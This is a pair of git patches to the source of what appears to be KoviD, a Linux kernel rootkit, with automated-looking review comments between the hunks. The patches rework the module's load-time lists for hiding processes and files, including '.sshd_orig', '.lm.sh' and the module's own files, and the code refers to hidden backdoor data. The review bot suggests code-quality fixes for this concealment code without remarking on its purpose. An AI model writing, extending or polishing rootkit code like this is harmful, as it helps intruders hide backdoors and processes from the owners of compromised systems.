From 5aef9e0093a4c967639a7cdcdcdbf187f2842f9e Mon Sep 17 00:00:00 2001
From: JNE
Date: Fri, 26 Apr 2024 11:28:33 +0100
Subject: [PATCH 1/2] Eliminate netapp

netapp kind of lost its purpose, i tis more generic than "network applicatons" since most processes can be hidden during load time in kv.
---
 src/kovid.c | 9 ++++-----
 src/lkm.h | 13 ++++++++++++-
 src/netapp.h | 14 --------------
 src/pid.c | 11 +++++------
 4 files changed, 21 insertions(+), 26 deletions(-)
 delete mode 100644 src/netapp.h

diff --git a/src/kovid.c b/src/kovid.c
index 466e559..e57bba5 100644
--- a/src/kovid.c
+++ b/src/kovid.c
@@ -736,12 +736,11 @@ static int __init kv_init(void) {
 /** hide magic filenames & directories */
 fs_add_name_ro(names);
 
- /** Hide network applications that match
- * the names defined in netapp.h
- * tunnels, external backdoors...
- * Run once
+ /** Hide applications onload that match
+ * the names defined in lkm.h
+ * It runs only once
 */
- kv_scan_and_hide_netapp();
+ kv_scan_and_hide();
 
 #ifndef DEBUG_RING_BUFFER
 /** *pr_info because it must be shown even if DEPLOY=1 */
diff --git a/src/lkm.h b/src/lkm.h
index e8d8617..e6975eb 100644
--- a/src/lkm.h
+++ b/src/lkm.h
@@ -132,7 +132,7 @@ bool kv_for_each_hidden_backdoor_data(bool (*cb)(__be32, void *), void *);
 void kv_reload_hidden_task(struct task_struct *task);
 void kv_pid_cleanup(void);
 void kv_show_saved_tasks(void);
-void kv_scan_and_hide_netapp(void);
+void kv_scan_and_hide(void);
 
 /** syscall,function addresses */
 struct kernel_syscalls *kv_kall_load_addr(void);
@@ -160,6 +160,17 @@ char *kv_util_random_AZ_string(size_t);
 /** VM operations */
 unsigned long kv_get_elf_vm_start(pid_t);
 
+ /*
+ * The names below are just examples and can be
+ * modified and/or extended at will
+ * warning: don't add backdoor programs here
+ */
+static const char *hide_on_load_list[] = {
+ "whitenose", "pinknose", "rednose", "blacknose",
+ "greynose", "purplenose", "bluenose", NULL
+};
+
+
 // PP_NARG from
 // https://groups.google.com/forum/#!topic/comp.std.c/d-6Mj5Lko_s
 #define PP_NARG(...) \
diff --git a/src/netapp.h b/src/netapp.h
deleted file mode 100644
index d56f5e9..0000000
--- a/src/netapp.h
+++ /dev/null
@@ -1,14 +0,0 @@
-#ifndef __NETAPP_H
-#define __NETAPP_H
-
- /*
- * The names below are just examples and can be
- * modified and/or extended at will
- * warning: don't add backdoor programs here
- */
-static const char *netapp_list[] = {
- "whitenose", "pinknose", "rednose", "blacknose",
- "greynose", "purplenose", "bluenose", NULL
-};
-
-#endif
diff --git a/src/pid.c b/src/pid.c
index 67d28ed..43c1247 100644
--- a/src/pid.c
+++ b/src/pid.c
@@ -16,7 +16,6 @@
 #include
 #include "lkm.h"
 #include "fs.h"
-#include "netapp.h"
 
 static LIST_HEAD(tasks_node);
 #ifdef DEBUG_RING_BUFFER
@@ -455,7 +454,7 @@ bool kv_for_each_hidden_backdoor_data(bool (*cb)(__be32, void *), void *priv) {
 * that this function also conceals the connections of network applications.
 * For more information, refer to 'netapp.h'.
 */
-void kv_scan_and_hide_netapp(void) {
+void kv_scan_and_hide(void) {
 struct task_struct *t;
 
 for_each_process(t) {
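Review bot: `static const char *hide_on_load_list[]` is a definition placed in lkm.h, so every translation unit that includes the header gets its own private copy of the array, and any unit that includes it without reading the list carries a dead copy; the same pattern is kept, and a second array added the same way, in the lkm.h hunk of the second patch (`@@ -161,15 +161,22 @@`). Keep the header to a declaration, `extern const char *hide_on_load_list[];`, and put the single definition in pid.c next to kv_scan_and_hide, which is the list's only reader in this commit. The comment carried over from netapp.h still describes the entries as "just examples"; now that the list drives a scan at load time, it should say what the entries are compared against (the task's `comm`, per the pid.c hunk of this patch).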
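Review bot: The doc comment kept as context above the renamed `kv_scan_and_hide` still ends with `For more information, refer to 'netapp.h'`, but this very commit deletes that header, so the reference now points nowhere. Reword it to name the list's new location, e.g. `* For more information, see hide_on_load_list in 'lkm.h'.`; the preceding sentence about "network applications" is stale for the same reason the commit message gives. The function's body continues past the end of the hunk.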
@@ -467,13 +466,13 @@ void kv_scan_and_hide_netapp(void) {
 if (!(fnode = fs_get_file_node(t))) continue;
 
 /* XXX: optimise this */
- for (; netapp_list[i] != NULL; ++i) {
- if (strncmp(netapp_list[i], t->comm, strlen(netapp_list[i]))) continue;
- prinfo("Hide netapp task: %d %s i=%d '%s'\n", t->pid, fnode->filename, i, netapp_list[i]);
+ for (; hide_on_load_list[i] != NULL; ++i) {
+ if (strncmp(hide_on_load_list[i], t->comm, strlen(hide_on_load_list[i]))) continue;
+ prinfo("Hide netapp task: %d %s i=%d '%s'\n", t->pid, fnode->filename, i, hide_on_load_list[i]);
 /**
 * notice that any netapp added here
 * will NOT be killed if kv is unloaded
- * In reality an application that is listed in netapp_list will be handled
+ * In reality an application that is listed in hide_on_load_list will be handled
 * in the same way as if you manually hide a parent process:
 * echo >/proc/kv
 */

From 89aa0cd4fa2c3e089fb23b259a64b09095b0567b Mon Sep 17 00:00:00 2001
From: JNE
Date: Fri, 26 Apr 2024 12:38:30 +0100
Subject: [PATCH 2/2] Move pieces around

---
 src/kovid.c | 14 +++----------
 src/lkm.h | 15 +++++++++++----
 src/pid.c | 9 ++++-----
 3 files changed, 18 insertions(+), 20 deletions(-)

diff --git a/src/kovid.c b/src/kovid.c
index e57bba5..71bee86 100644
--- a/src/kovid.c
+++ b/src/kovid.c
@@ -682,12 +682,6 @@ static int __init kv_init(void) {
 #if LINUX_VERSION_CODE >= KERNEL_VERSION(5,17,0)
 struct kernel_syscalls *kaddr = NULL;
 #endif
- const char *names[] = {
- ".kovid", "kovid", "kovid.ko", ".kv.ko", ".lm.sh", ".sshd_orig",
- "whitenose", "pinknose", "rednose", "greynose", "purplenose",
- "blacknose", "bluenose", NULL
- };
-
 if (strlen(PROCNAME) == 0) {
 procname_err = "Empty PROCNAME build parameter. Check Makefile.";
 } else if (!strncmp(PROCNAME, "changeme", 5)) {
@@ -734,12 +728,10 @@ static int __init kv_init(void) {
 kv_hide_task_by_pid(tsk_prc->pid, 0, CHILDREN);
 
 /** hide magic filenames & directories */
- fs_add_name_ro(names);
+ fs_add_name_ro(kv_hide_str_on_load);
 
- /** Hide applications onload that match
- * the names defined in lkm.h
- * It runs only once
- */
+ /** hide magic filenames, directories and processes */
+ fs_add_name_ro(kv_hide_ps_on_load);
 kv_scan_and_hide();
 
 #ifndef DEBUG_RING_BUFFER
diff --git a/src/lkm.h b/src/lkm.h
index e6975eb..c308057 100644
--- a/src/lkm.h
+++ b/src/lkm.h
@@ -161,15 +161,22 @@ char *kv_util_random_AZ_string(size_t);
 unsigned long kv_get_elf_vm_start(pid_t);
 
 /*
- * The names below are just examples and can be
- * modified and/or extended at will
- * warning: don't add backdoor programs here
+ * Hide these process names during load
+ * children included
 */
-static const char *hide_on_load_list[] = {
+static const char *kv_hide_ps_on_load[] = {
 "whitenose", "pinknose", "rednose", "blacknose",
 "greynose", "purplenose", "bluenose", NULL
 };
 
+/*
+ * Hide these names from write() fs output
+ */
+static const char *kv_hide_str_on_load[] = {
+ ".kovid", "kovid", "kovid.ko", ".kv.ko",
+ ".lm.sh", ".sshd_orig", NULL
+};
+
 
 // PP_NARG from
 // https://groups.google.com/forum/#!topic/comp.std.c/d-6Mj5Lko_s
diff --git a/src/pid.c b/src/pid.c
index 43c1247..8fbb532 100644
--- a/src/pid.c
+++ b/src/pid.c
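Review bot: The two comments on the new side overlap and leave the reader unsure which list each describes: `/** hide magic filenames & directories */` sits over `fs_add_name_ro(kv_hide_str_on_load);`, and `/** hide magic filenames, directories and processes */` sits over `fs_add_name_ro(kv_hide_ps_on_load);` followed by `kv_scan_and_hide();`. One comment above the three calls would be clearer, e.g. `/** register both lkm.h name lists with the fs filter, then scan running tasks against kv_hide_ps_on_load */`. The comment this hunk removes was also the only place stating that the scan runs only once at load; that fact should survive, either here or on kv_scan_and_hide's own doc comment in pid.c. kv_init continues outside the hunk on both sides.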
@@ -465,14 +465,13 @@ void kv_scan_and_hide(void) {
 if (kv_find_hidden_task(t)) continue;
 if (!(fnode = fs_get_file_node(t))) continue;
 
- /* XXX: optimise this */
- for (; hide_on_load_list[i] != NULL; ++i) {
- if (strncmp(hide_on_load_list[i], t->comm, strlen(hide_on_load_list[i]))) continue;
- prinfo("Hide netapp task: %d %s i=%d '%s'\n", t->pid, fnode->filename, i, hide_on_load_list[i]);
+ for (; kv_hide_ps_on_load[i] != NULL; ++i) {
+ if (strncmp(kv_hide_ps_on_load[i], t->comm, strlen(kv_hide_ps_on_load[i]))) continue;
+ prinfo("Hide task name '%s' from '%s' of pid %d\n", t->comm, fnode->filename, t->pid);
 /**
 * notice that any netapp added here
 * will NOT be killed if kv is unloaded
- * In reality an application that is listed in kv_hide_ps_on_load will be handled
+ * In reality an application that is listed in kv_hide_ps_on_load will be handled
 * in the same way as if you manually hide a parent process:
 * echo >/proc/kv
 */
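Review bot: The block comment inside the loop still opens with `* notice that any netapp added here` even though the prinfo line in this same hunk was reworded away from "netapp" and the next comment line was updated to cite `kv_hide_ps_on_load`; change it to `* notice that any task matched from kv_hide_ps_on_load here` so the two lines agree. The hunk also drops `/* XXX: optimise this */` while leaving the loop it annotated untouched, so if the linear scan is still considered a to-do the marker should stay rather than disappear silently. kv_scan_and_hide begins before this hunk and the loop closes after it.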